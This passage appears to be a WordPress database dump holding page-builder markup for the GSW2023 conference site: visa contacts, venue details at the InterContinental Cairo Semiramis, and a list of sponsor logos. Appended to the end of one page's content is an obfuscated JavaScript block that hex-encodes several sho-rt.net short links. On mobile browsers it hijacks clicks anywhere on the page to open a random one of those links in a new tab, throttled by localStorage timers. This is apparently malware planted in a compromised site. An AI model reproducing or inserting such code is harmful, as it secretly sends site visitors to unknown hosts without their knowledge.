</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:57:16','2023-08-13 03:57:16','',3066,'https://gsw2023.com/?p=5101',0,'revision','',0),
(5102,1,'2023-08-13 04:00:01','2023-08-13 04:00:01','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference 